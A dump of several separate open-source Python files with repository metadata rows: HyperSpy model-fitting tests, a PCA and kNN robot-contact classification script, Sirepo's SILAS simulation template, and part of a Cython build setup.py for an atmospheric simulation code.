variance + std ** 2)
m = s.create_model()
m.append(hs.model.components1D.Polynomial(order=1))
self.s = s
self.m = m
def test_std1_red_chisq(self):
self.m.multifit(fitter="leastsq", method="ls", show_progressbar=None)
np.testing.assert_almost_equal(self.m.red_chisq.data[0],
0.79693355673230915)
np.testing.assert_almost_equal(self.m.red_chisq.data[1],
0.91453032901427167)
class TestMultifit:
def setUp(self):
s = hs.signals.Signal1D(np.zeros((2, 200)))
s.axes_manager[-1].offset = 1
s.data[:] = 2 * s.axes_manager[-1].axis ** (-3)
m = s.create_model()
m.append(hs.model.components1D.PowerLaw())
m[0].A.value = 2
m[0].r.value = 2
m.store_current_values()
m.axes_manager.indices = (1,)
m[0].r.value = 100
m[0].A.value = 2
m.store_current_values()
m[0].A.free = False
self.m = m
m.axes_manager.indices = (0,)
m[0].A.value = 100
def test_fetch_only_fixed_false(self):
self.m.multifit(fetch_only_fixed=False, show_progressbar=None)
np.testing.assert_array_almost_equal(self.m[0].r.map['values'],
[3., 100.])
np.testing.assert_array_almost_equal(self.m[0].A.map['values'],
[2., 2.])
def test_fetch_only_fixed_true(self):
self.m.multifit(fetch_only_fixed=True, show_progressbar=None)
np.testing.assert_array_almost_equal(self.m[0].r.map['values'],
[3., 3.])
np.testing.assert_array_almost_equal(self.m[0].A.map['values'],
[2., 2.])
def test_parameter_as_signal_values(self):
# There are more as_signal tests in test_parameters.py
rs = self.m[0].r.as_signal(field="values")
np.testing.assert_almost_equal(rs.data, np.array([2., 100.]))
nt.assert_false("Signal.Noise_properties.variance" in rs.metadata)
self.m.multifit(fetch_only_fixed=True, show_progressbar=None)
rs = self.m[0].r.as_signal(field="values")
nt.assert_true("Signal.Noise_properties.variance" in rs.metadata)
nt.assert_is_instance(rs.metadata.Signal.Noise_properties.variance,
hs.signals.Signal1D)
def test_bounded_snapping_mpfit(self):
m = self.m
m[0].A.free = True
m.signal.data *= 2.
m[0].A.value = 2.
m[0].A.bmin = 3.
m.multifit(fitter='mpfit', bounded=True, show_progressbar=None)
np.testing.assert_array_almost_equal(self.m[0].r.map['values'],
[3., 3.])
np.testing.assert_array_almost_equal(self.m[0].A.map['values'],
[4., 4.])
def test_bounded_snapping_leastsq(self):
m = self.m
m[0].A.free = True
m.signal.data *= 2.
m[0].A.value = 2.
m[0].A.bmin = 3.
m.multifit(fitter='leastsq', bounded=True, show_progressbar=None)
np.testing.assert_array_almost_equal(self.m[0].r.map['values'],
[3., 3.])
np.testing.assert_array_almost_equal(self.m[0].A.map['values'],
[4., 4.])
class TestStoreCurrentValues:
def setUp(self):
self.m = hs.signals.Signal1D(np.arange(10)).create_model()
self.o = hs.model.components1D.Offset()
self.m.append(self.o)
def test_active(self):
self.o.offset.value = 2
self.o.offset.std = 3
self.m.store_current_values()
nt.assert_equal(self.o.offset.map["values"][0], 2)
nt.assert_equal(self.o.offset.map["is_set"][0], True)
def test_not_active(self):
self.o.active = False
self.o.offset.value = 2
self.o.offset.std = 3
self.m.store_current_values()
nt.assert_not_equal(self.o.offset.map["values"][0], 2)
class TestSetCurrentValuesTo:
def setUp(self):
self.m = hs.signals.Signal1D(
np.arange(10).reshape(2, 5)).create_model()
self.comps = [
hs.model.components1D.Offset(),
hs.model.components1D.Offset()]
self.m.extend(self.comps)
def test_set_all(self):
for c in self.comps:
c.offset.value = 2
self.m.assign_current_values_to_all()
nt.assert_true((self.comps[0].offset.map["values"] == 2).all())
nt.assert_true((self.comps[1].offset.map["values"] == 2).all())
def test_set_1(self):
self.comps[1].offset.value = 2
self.m.assign_current_values_to_all([self.comps[1]])
nt.assert_true((self.comps[0].offset.map["values"] != 2).all())
nt.assert_true((self.comps[1].offset.map["values"] == 2).all())
class TestAsSignal:
def setUp(self):
self.m = hs.signals.Signal1D(
np.arange(10).reshape(2, 5)).create_model()
self.comps = [
hs.model.components1D.Offset(),
hs.model.components1D.Offset()]
self.m.extend(self.comps)
for c in self.comps:
c.offset.value = 2
self.m.assign_current_values_to_all()
def test_all_components_simple(self):
s = self.m.as_signal(show_progressbar=None)
nt.assert_true(np.all(s.data == 4.))
def test_one_component_simple(self):
s = self.m.as_signal(component_list=[0], show_progressbar=None)
nt.assert_true(np.all(s.data == 2.))
nt.assert_true(self.m[1].active)
def test_all_components_multidim(self):
self.m[0].active_is_multidimensional = True
s = self.m.as_signal(show_progressbar=None)
nt.assert_true(np.all(s.data == 4.))
self.m[0]._active_array[0] = False
s = self.m.as_signal(show_progressbar=None)
np.testing.assert_array_equal(
s.data, np.array([np.ones(5) * 2, np.ones(5) * 4]))
nt.assert_true(self.m[0].active_is_multidimensional)
def test_one_component_multidim(self):
self.m[0].active_is_multidimensional = True
s = self.m.as_signal(component_list=[0], show_progressbar=None)
nt.assert_true(np.all(s.data == 2.))
nt.assert_true(self.m[1].active)
nt.assert_false(self.m[1].active_is_multidimensional)
s = self.m.as_signal(component_list=[1], show_progressbar=None)
np.testing.assert_equal(s.data, 2.)
nt.assert_true(self.m[0].active_is_multidimensional)
self.m[0]._active_array[0] = False
s = self.m.as_signal(component_list=[1], show_progressbar=None)
nt.assert_true(np.all(s.data == 2.))
s = self.m.as_signal(component_list=[0], show_progressbar=None)
np.testing.assert_array_equal(s.data,
np.array([np.zeros(5), np.ones(5) * 2]))
class TestCreateModel:
def setUp(self):
self.s = hs.signals.Signal1D(np.asarray([0, ]))
self.im = hs.signals.Signal2D(np.ones([1, 1, ]))
def test_create_model(self):
from hyperspy.models.model1d import Model1D
from hyperspy.models.model2d import Model2D
nt.assert_is_instance(
self.s.create_model(), Model1D)
nt.assert_is_instance(
self.im.create_model(), Model2D)
class TestAdjustPosition:
def setUp(self):
self.s = hs.signals.Signal1D(np.random.rand(10, 10, 20))
self.m = self.s.create_model()
def test_enable_adjust_position(self):
self.m.append(hs.model.components1D.Gaussian())
self.m.enable_adjust_position()
nt.assert_equal(len(self.m._position_widgets), 1)
# Check that both line and label was added
nt.assert_equal(len(list(self.m._position_widgets.values())[0]), 2)
def test_disable_adjust_position(self):
self.m.append(hs.model.components1D.Gaussian())
self.m.enable_adjust_position()
self.m.disable_adjust_position()
nt.assert_equal(len(self.m._position_widgets), 0)
def test_enable_all(self):
self.m.append(hs.model.components1D.Gaussian())
self.m.enable_adjust_position()
self.m.append(hs.model.components1D.Gaussian())
nt.assert_equal(len(self.m._position_widgets), 2)
def test_enable_all_zero_start(self):
self.m.enable_adjust_position()
self.m.append(hs.model.components1D.Gaussian())
nt.assert_equal(len(self.m._position_widgets), 1)
def test_manual_close(self):
self.m.append(hs.model.components1D.Gaussian())
self.m.append(hs.model.components1D.Gaussian())
self.m.enable_adjust_position()
list(self.m._position_widgets.values())[0][0].close()
nt.assert_equal(len(self.m._position_widgets), 2)
nt.assert_equal(len(list(self.m._position_widgets.values())[0]), 1)
list(self.m._position_widgets.values())[0][0].close()
nt.assert_equal(len(self.m._position_widgets), 1)
nt.assert_equal(len(list(self.m._position_widgets.values())[0]), 2)
self.m.disable_adjust_position()
nt.assert_equal(len(self.m._position_widgets), 0)
| vidartf/hyperspy | hyperspy/tests/model/test_model.py | Python | gpl-3.0 | 41,020 | [
"Gaussian"
] | bd043695b02915ad46e48f95c308290b76549e42a62a088df11f9188e236b0cd |
# Principal Component Analysis Code :
from numpy import mean,cov,double,cumsum,dot,linalg,array,rank,size,flipud
from pylab import *
import numpy as np
import matplotlib.pyplot as pp
#from enthought.mayavi import mlab
import scipy.ndimage as ni
import roslib; roslib.load_manifest('sandbox_tapo_darpa_m3')
import rospy
#import hrl_lib.mayavi2_util as mu
import hrl_lib.viz as hv
import hrl_lib.util as ut
import hrl_lib.matplotlib_util as mpu
import pickle
from mvpa.clfs.knn import kNN
from mvpa.datasets import Dataset
from mvpa.clfs.transerror import TransferError
from mvpa.misc.data_generators import normalFeatureDataset
from mvpa.algorithms.cvtranserror import CrossValidatedTransferError
from mvpa.datasets.splitters import NFoldSplitter
import sys
sys.path.insert(0, '/home/tapo/svn/robot1_data/usr/tapo/data_code/Classification/Data/Single_Contact_kNN/Scaled')
from data_method_V import Fmat_original
def pca(X):
#get dimensions
num_data,dim = X.shape
#center data
mean_X = X.mean(axis=1)
M = (X-mean_X) # subtract the mean (along columns)
Mcov = cov(M)
###### Sanity Check ######
i=0
n=0
while i < 82:
j=0
while j < 140:
if X[i,j] != X[i,j]:
print X[i,j]
print i,j
n=n+1
j = j+1
i=i+1
print n
##########################
print 'PCA - COV-Method used'
val,vec = linalg.eig(Mcov)
#return the projection matrix, the variance and the mean
return vec,val,mean_X, M, Mcov
if __name__ == '__main__':
Fmat = np.row_stack([Fmat_original[0:41,:], Fmat_original[82:123,:]])
# Checking the Data-Matrix
m_tot, n_tot = np.shape(Fmat)
print 'Total_Matrix_Shape:',m_tot,n_tot
eigvec_total, eigval_total, mean_data_total, B, C = pca(Fmat)
#print eigvec_total
#print eigval_total
#print mean_data_total
m_eigval_total, n_eigval_total = np.shape(np.matrix(eigval_total))
m_eigvec_total, n_eigvec_total = np.shape(eigvec_total)
m_mean_data_total, n_mean_data_total = np.shape(np.matrix(mean_data_total))
print 'Eigenvalue Shape:',m_eigval_total, n_eigval_total
print 'Eigenvector Shape:',m_eigvec_total, n_eigvec_total
print 'Mean-Data Shape:',m_mean_data_total, n_mean_data_total
#Recall that the cumulative sum of the eigenvalues shows the level of variance accounted by each of the corresponding eigenvectors. On the x axis there is the number of eigenvalues used.
perc_total = cumsum(eigval_total)/sum(eigval_total)
# Reduced Eigen-Vector Matrix according to highest Eigenvalues..(Considering First 20 based on above figure)
W = eigvec_total[:,0:20]
m_W, n_W = np.shape(W)
print 'Reduced Dimension Eigenvector Shape:',m_W, n_W
# Normalizes the data set with respect to its variance (Not an Integral part of PCA, but useful)
length = len(eigval_total)
s = np.matrix(np.zeros(length)).T
i = 0
while i < length:
s[i] = sqrt(C[i,i])
i = i+1
Z = np.divide(B,s)
m_Z, n_Z = np.shape(Z)
print 'Z-Score Shape:', m_Z, n_Z
#Projected Data:
Y = (W.T)*B # 'B' for my Laptop: otherwise 'Z' instead of 'B'
m_Y, n_Y = np.shape(Y.T)
print 'Transposed Projected Data Shape:', m_Y, n_Y
#Using PYMVPA
PCA_data = np.array(Y.T)
PCA_label_2 = ['Styrofoam-Fixed']*5 + ['Books-Fixed']*5 + ['Bucket-Fixed']*5 + ['Bowl-Fixed']*5 + ['Can-Fixed']*5 + ['Box-Fixed']*5 + ['Pipe-Fixed']*5 + ['Styrofoam-Movable']*5 + ['Container-Movable']*5 + ['Books-Movable']*5 + ['Cloth-Roll-Movable']*5 + ['Black-Rubber-Movable']*5 + ['Can-Movable']*5 + ['Box-Movable']*5 + ['Rug-Fixed']*5 + ['Bubble-Wrap-1-Fixed']*5 + ['Pillow-1-Fixed']*5 + ['Bubble-Wrap-2-Fixed']*5 + ['Sponge-Fixed']*5 + ['Foliage-Fixed']*5 + ['Pillow-2-Fixed']*5 + ['Rug-Movable']*5 + ['Bubble-Wrap-1-Movable']*5 + ['Pillow-1-Movable']*5 + ['Bubble-Wrap-2-Movable']*5 + ['Pillow-2-Movable']*5 + ['Plush-Toy-Movable']*5 + ['Sponge-Movable']*5
clf = kNN(k=1)
terr = TransferError(clf)
ds1 = Dataset(samples=PCA_data,labels=PCA_label_2)
print ds1.samples.shape
cvterr = CrossValidatedTransferError(terr,NFoldSplitter(cvtype=1),enable_states=['confusion'])
error = cvterr(ds1)
print error
print cvterr.confusion.asstring(description=False)
figure(1)
cvterr.confusion.plot(numbers='True',numbers_alpha=2)
#show()
# Variances
figure(2)
title('Variances of PCs')
stem(range(len(perc_total)),perc_total,'--b')
axis([-0.3,130.3,0,1.2])
grid('True')
show()
| tapomayukh/projects_in_python | classification/Classification_with_kNN/Single_Contact_Classification/Feature_Comparison/multiple_features/results/test10_cross_validate_objects_1200ms_scaled_method_v_force_motion.py | Python | mit | 4,600 | [
"Mayavi"
] | a9c398d1595ca9a5e30ad94fd707717794b8368064154a63da5c08d696c644b8 |
# -*- coding: utf-8 -*-
u"""SILAS execution template.
:copyright: Copyright (c) 2020 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
from pykern import pkio
from pykern import pkjson
from pykern.pkcollections import PKDict
from pykern.pkdebug import pkdp, pkdc, pkdlog
from scipy import constants
from sirepo import simulation_db
from sirepo.template import template_common
import csv
import h5py
import math
import numpy as np
import re
import sirepo.sim_data
_SIM_DATA, SIM_TYPE, _SCHEMA = sirepo.sim_data.template_globals()
_CRYSTAL_CSV_FILE = 'crystal.csv'
_SUMMARY_CSV_FILE = 'wavefront.csv'
_INITIAL_LASER_FILE = 'initial-laser.npy'
_FINAL_LASER_FILE = 'final-laser.npy'
def background_percent_complete(report, run_dir, is_running):
data = simulation_db.read_json(run_dir.join(template_common.INPUT_BASE_NAME))
res = PKDict(
percentComplete=0,
frameCount=0,
)
if report == 'animation':
line = template_common.read_last_csv_line(run_dir.join(_SUMMARY_CSV_FILE))
m = re.search(r'^(\d+)', line)
if m and int(m.group(1)) > 0:
res.frameCount = int((int(m.group(1)) + 1) / 2)
res.wavefrontsFrameCount = _counts_for_beamline(res.frameCount, data.models.beamline)[0]
total_count = _total_frame_count(data)
res.percentComplete = res.frameCount * 100 / total_count
return res
assert report == 'crystalAnimation'
count = 0
path = run_dir.join(_CRYSTAL_CSV_FILE)
if path.exists():
with pkio.open_text(str(path)) as f:
for line in f:
count += 1
# first two lines are axis points
if count > 2:
plot_count = int((count - 2) / 2)
res.frameCount = plot_count
res.percentComplete = plot_count * 100 / (1 + data.models.crystalSettings.steps / data.models.crystalSettings.plotInterval)
return res
def post_execution_processing(success_exit=True, run_dir=None, **kwargs):
if success_exit:
return None
return _parse_silas_log(run_dir)
def get_data_file(run_dir, model, frame, options=None, **kwargs):
if model in ('laserPulseAnimation', 'laserPulse2Animation'):
return _INITIAL_LASER_FILE
if model in ('laserPulse3Animation', 'laserPulse4Animation'):
return _FINAL_LASER_FILE
if model == 'wavefrontSummaryAnimation':
return _SUMMARY_CSV_FILE
if 'wavefrontAnimation' in model:
sim_in = simulation_db.read_json(run_dir.join(template_common.INPUT_BASE_NAME))
return _wavefront_filename_for_index(
sim_in,
sim_in.models[model].id,
frame,
)
if 'plotAnimation' in model:
return _CRYSTAL_CSV_FILE
if model == 'crystal3dAnimation':
return 'intensity.npy'
raise AssertionError('unknown model={}'.format(model))
def python_source_for_model(data, model):
if model in ('crystal3dAnimation', 'plotAnimation', 'plot2Animation'):
data.report = 'crystalAnimation'
else:
data.report = 'animation'
return _generate_parameters_file(data)
def sim_frame(frame_args):
filename = _wavefront_filename_for_index(
frame_args.sim_in,
frame_args.id,
frame_args.frameIndex,
)
with h5py.File(filename, 'r') as f:
wfr = f['wfr']
points = np.array(wfr)
return PKDict(
title='S={}m (E={} eV)'.format(
_format_float(wfr.attrs['pos']),
frame_args.sim_in.models.gaussianBeam.photonEnergy,
),
subtitle='',
x_range=[wfr.attrs['xStart'], wfr.attrs['xFin'], len(points[0])],
x_label='Horizontal Position [m]',
y_range=[wfr.attrs['yStart'], wfr.attrs['yFin'], len(points)],
y_label='Vertical Position [m]',
z_matrix=points.tolist(),
summaryData=_summary_data(frame_args),
)
def sim_frame_crystal3dAnimation(frame_args):
intensity = np.load('intensity.npy')
return PKDict(
title=' ',
indices=np.load('indices.npy').flatten().tolist(),
vertices=np.load('vertices.npy').flatten().tolist(),
intensity=intensity.tolist(),
intensity_range=[np.min(intensity), np.max(intensity)],
)
def sim_frame_laserPulse1Animation(frame_args):
return _laser_pulse_report(1, _INITIAL_LASER_FILE, 'Before Propagation', 'RMS x [m]')
def sim_frame_laserPulse2Animation(frame_args):
return _laser_pulse_report(3, _INITIAL_LASER_FILE, 'Before Propagation', 'Pulse Intensity')
def sim_frame_laserPulse3Animation(frame_args):
return _laser_pulse_report(1, _FINAL_LASER_FILE, 'After Propagation', 'RMS x [m]')
def sim_frame_laserPulse4Animation(frame_args):
return _laser_pulse_report(3, _FINAL_LASER_FILE, 'After Propagation', 'Pulse Intensity')
def sim_frame_plotAnimation(frame_args):
return _crystal_plot(frame_args, 'xv', 'ux', '[m]', 1e-2)
def sim_frame_plot2Animation(frame_args):
return _crystal_plot(frame_args, 'zv', 'uz', '[m]', 1e-2)
def sim_frame_wavefrontSummaryAnimation(frame_args):
beamline = frame_args.sim_in.models.beamline
if 'element' not in frame_args:
frame_args.element = 'all'
idx = 0
title = ''
if frame_args.element != 'all':
# find the element index from the element id
for item in beamline:
if item.id == int(frame_args.element):
title = item.title
break
idx += 1
#TODO(pjm): use column headings from csv
cols = ['count', 'pos', 'sx', 'sy', 'xavg', 'yavg']
v = np.genfromtxt(str(frame_args.run_dir.join(_SUMMARY_CSV_FILE)), delimiter=',', skip_header=1)
if frame_args.element != 'all':
# the wavefront csv include intermediate values, so take every other row
counts = _counts_for_beamline(int((v[-1][0] + 1) / 2), beamline)[1]
v2 = []
for row in counts[idx]:
v2.append(v[(row - 1) * 2])
v = np.array(v2)
#TODO(pjm): generalize, use template_common parameter_plot()?
plots = []
for col in ('sx', 'sy'):
plots.append(PKDict(
points=v[:, cols.index(col)].tolist(),
label=f'{col} [m]',
))
x = v[:, cols.index('pos')].tolist()
return PKDict(
aspectRatio=1 / 5.0,
title='{} Wavefront Dimensions'.format(title),
x_range=[float(min(x)), float(max(x))],
y_label='',
x_label='s [m]',
x_points=x,
plots=plots,
y_range=template_common.compute_plot_color_and_range(plots),
summaryData=_summary_data(frame_args),
)
def stateless_compute_compute_rms_size(data):
return _compute_rms_size(data)
def write_parameters(data, run_dir, is_parallel):
pkio.write_text(
run_dir.join(template_common.PARAMETERS_PYTHON_FILE),
_generate_parameters_file(data),
)
def _compute_rms_size(data):
wavefrontEnergy = data.gaussianBeam.photonEnergy
n0 = data.crystal.refractionIndex
L_cryst = data.crystal.width * 1e-2
dfL = data.mirror.focusingError
L_cav = data.simulationSettings.cavity_length
L_eff = L_cav + (1 / n0 - 1) * L_cryst
beta0 = math.sqrt(L_eff * (L_cav / 4 + dfL) - L_eff ** 2 / 4)
lam = constants.c * constants.value('Planck constant in eV/Hz') / wavefrontEnergy
return PKDict(
rmsSize=math.sqrt(lam*beta0/4/math.pi)
)
def _counts_for_beamline(total_frames, beamline):
# start at 2nd element, loop forward and backward across beamline
counts = [0 for _ in beamline]
idx = 1
direction = 1
frames = [[] for _ in beamline]
for i in range(total_frames):
counts[idx] += 1
frames[idx].append(i + 1)
idx += direction
if idx < 0 or idx > len(counts) - 1:
direction *= -1
idx += 2 * direction
return counts, frames
def _crystal_plot(frame_args, x_column, y_column, x_heading, scale):
x = None
plots = []
with open(str(frame_args.run_dir.join(_CRYSTAL_CSV_FILE))) as f:
for r in csv.reader(f):
if x is None and r[0] == x_column:
r.pop(0)
r.pop(0)
x = [float(v) * scale for v in r]
elif r[0] == y_column:
r.pop(0)
t = r.pop(0)
plots.append(PKDict(
points=[float(v) for v in r],
label='{:.1f} sec'.format(float(t)),
))
return PKDict(
title='',
x_range=[min(x), max(x)],
y_label='Temperature [°C]',
x_label=x_heading,
x_points=x,
plots=plots,
y_range=template_common.compute_plot_color_and_range(plots),
summaryData=_summary_data(frame_args),
)
def _format_float(v):
return float('{:.4f}'.format(v))
def _generate_parameters_file(data):
if data.report == 'animation':
beamline = data.models.beamline
data.models.crystal = _get_crystal(data)
res, v = template_common.generate_parameters_file(data)
v.leftMirrorFocusingError = beamline[0].focusingError
v.rightMirrorFocusingError = beamline[-1].focusingError
v.summaryCSV = _SUMMARY_CSV_FILE
v.initialLaserFile = _INITIAL_LASER_FILE
v.finalLaserFile = _FINAL_LASER_FILE
return res + template_common.render_jinja(SIM_TYPE, v)
if data.report == 'crystalAnimation':
res, v = template_common.generate_parameters_file(data)
v.crystalCSV = _CRYSTAL_CSV_FILE
return res + template_common.render_jinja(SIM_TYPE, v, 'crystal.py')
assert False, 'invalid param report: {}'.format(data.report)
def _get_crystal(data):
return data.models.beamline[1]
def _laser_pulse_report(value_index, filename, title, label):
values = np.load(filename)
return template_common.parameter_plot(
values[0].tolist(),
[
PKDict(
points=values[value_index].tolist(),
label=label,
),
],
PKDict(),
PKDict(
title=title,
y_label='',
x_label='s [m]',
),
)
def _parse_silas_log(run_dir):
res = ''
path = run_dir.join(template_common.RUN_LOG)
if not path.exists():
return res
with pkio.open_text(str(path)) as f:
for line in f:
m = re.search(r'^\s*\*+\s+Error:\s+(.*)$', line)
if m:
err = m.group(1)
if re.search('Unable to evaluate function at point', err):
return 'Point evaulated outside of mesh boundary. Consider increasing Mesh Density or Boundary Tolerance.'
res += err + '\n'
if res:
return res
return 'An unknown error occurred'
def _summary_data(frame_args):
return PKDict(
crystalWidth=frame_args.sim_in.models.beamline[1].width,
)
def _total_frame_count(data):
return data.models.simulationSettings.n_reflections * 2 * (len(data.models.beamline) - 1) + 1
def _wavefront_filename_for_index(sim_in, item_id, frame):
idx = 0
beamline = sim_in.models.beamline
for item in beamline:
if str(item_id) == str(item.id):
break
idx += 1
total_count = _total_frame_count(sim_in)
counts = _counts_for_beamline(total_count, beamline)[1]
counts = counts[idx]
file_index = counts[frame]
return f'wfr{file_index:05d}.h5'
| mkeilman/sirepo | sirepo/template/silas.py | Python | apache-2.0 | 11,600 | [
"CRYSTAL"
] | f72f762ca571c8497c07321ff6fbeacbfaae36deed5482dacdff760e08d17cef |
from distutils.core import setup
from Cython.Build import cythonize
from distutils.extension import Extension
import numpy as np
import mpi4py as mpi4py
import sys
import platform
import subprocess as sp
import os.path
import string
# Now get include paths from relevant python modules
include_path = [mpi4py.get_include()]
include_path += [np.get_include()]
include_path += ['./Csrc']
def get_netcdf_include():
return sp.check_output(['nc-config', '--includedir']).strip().decode()
def get_netcdf_prefix():
return sp.check_output(['nc-config', '--prefix']).strip().decode()
if sys.platform == 'darwin':
#Compile flags for MacOSX
library_dirs = []
libraries = []
extensions = []
extra_compile_args = []
extra_compile_args += ['-O3', '-march=native', '-Wno-unused', '-Wno-#warnings','-fPIC']
extra_objects=['./RRTMG/rrtmg_build/rrtmg_combined.o']
netcdf_include = get_netcdf_include()
netcdf_lib = os.path.join(get_netcdf_prefix(), 'lib')
f_compiler = 'gfortran'
elif 'eu' in platform.node():
#Compile flags for euler @ ETHZ
library_dirs = ['/cluster/apps/openmpi/1.6.5/x86_64/gcc_4.8.2/lib/']
libraries = []
libraries.append('mpi')
libraries.append('gfortran')
extensions = []
extra_compile_args=[]
extra_compile_args+=['-std=c99', '-O3', '-march=native', '-Wno-unused',
'-Wno-#warnings', '-Wno-maybe-uninitialized', '-Wno-cpp', '-Wno-array-bounds','-fPIC']
extra_objects=['./RRTMG/rrtmg_build/rrtmg_combined.o']
netcdf_include = '/cluster/apps/netcdf/4.3.1/x86_64/gcc_4.8.2/openmpi_1.6.5/include'
netcdf_lib = '/cluster/apps/netcdf/4.3.1/x86_64/gcc_4.8.2/openmpi_1.6.5/lib'
f_compiler = 'gfortran'
elif (platform.machine() == 'x86_64') and ('LD_LIBRARY_PATH' in os.environ):
#Compile flags for Central @ Caltech
library_dirs = os.environ['LD_LIBRARY_PATH'].split(':')
libraries = []
libraries.append('mpi')
libraries.append('gfortran')
extensions = []
extra_compile_args=[]
extra_compile_args+=['-std=c99', '-O3', '-march=native', '-Wno-unused',
'-Wno-#warnings', '-Wno-maybe-uninitialized', '-Wno-cpp', '-Wno-array-bounds','-fPIC']
extra_objects=['./RRTMG/rrtmg_build/rrtmg_combined.o']
netcdf_include = '/central/software/netcdf-c/4.6.1/include'
netcdf_lib = '/central/software/netcdf-c/4.6.1/lib'
# Comment the above two lines and uncomment below to use Fram@Caltech)
#netcdf_include = '/share/apps/software/rhel6/software/netCDF/4.4.0-foss-2016a/include'
#netcdf_lib = '/share/apps/software/rhel6/software/netCDF/4.4.0-foss-2016a/lib'
f_compiler = 'gfortran'
else:
if platform.system()=='Linux':
#Best guess at compile flags for a Linux computer
library_dirs = os.environ['PATH'].split(':')
libraries = []
libraries.append('mpi')
libraries.append('gfortran')
extensions = []
extra_compile_args=[]
extra_compile_args+=['-std=c99', '-O3', '-march=native', '-Wno-unused',
'-Wno-#warnings', '-Wno-maybe-uninitialized', '-Wno-cpp', '-Wno-array-bounds','-fPIC']
extra_objects=['./RRTMG/rrtmg_build/rrtmg_combined.o']
netcdf_include = '/share/apps/software/rhel6/software/netCDF/4.4.0-foss-2016a/include'
netcdf_lib = '/share/apps/software/rhel6/software/netCDF/4.4.0-foss-2016a/lib'
f_compiler = 'gfortran'
else:
print('Unknown system platform: ' + sys.platform + 'or unknown system name: ' + platform.node())
sys.exit()
_ext = Extension('Grid', ['Grid.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('Initialization', ['Initialization.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('Microphysics', ['Microphysics.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('Microphysics_Arctic_1M', ['Microphysics_Arctic_1M.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('thermodynamic_functions', ['thermodynamic_functions.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('Thermodynamics', ['Thermodynamics.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('ThermodynamicsDry', ['ThermodynamicsDry.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('ThermodynamicsSA', ['ThermodynamicsSA.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('ReferenceState', ['ReferenceState.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('Simulation3d', ['Simulation3d.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('ParallelMPI', ['ParallelMPI.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('PrognosticVariables', ['PrognosticVariables.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('DiagnosticVariables', ['DiagnosticVariables.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('ScalarAdvection', ['ScalarAdvection.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('MomentumAdvection', ['MomentumAdvection.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('ScalarDiffusion', ['ScalarDiffusion.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('MomentumDiffusion', ['MomentumDiffusion.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('FluxDivergence', ['FluxDivergence.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('PressureSolver', ['PressureSolver.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('PressureFFTSerial', ['PressureFFTSerial.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('PressureFFTParallel', ['PressureFFTParallel.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('SparseSolvers', ['SparseSolvers.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('SGS', ['SGS.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
runtime_library_dirs=library_dirs)
extensions.append(_ext)
_ext = Extension('TimeStepping', ['TimeStepping.pyx'], include_dirs=include_path,
extra_compile_args=extra_compile_args, libraries=libraries, library_dirs=library_dirs,
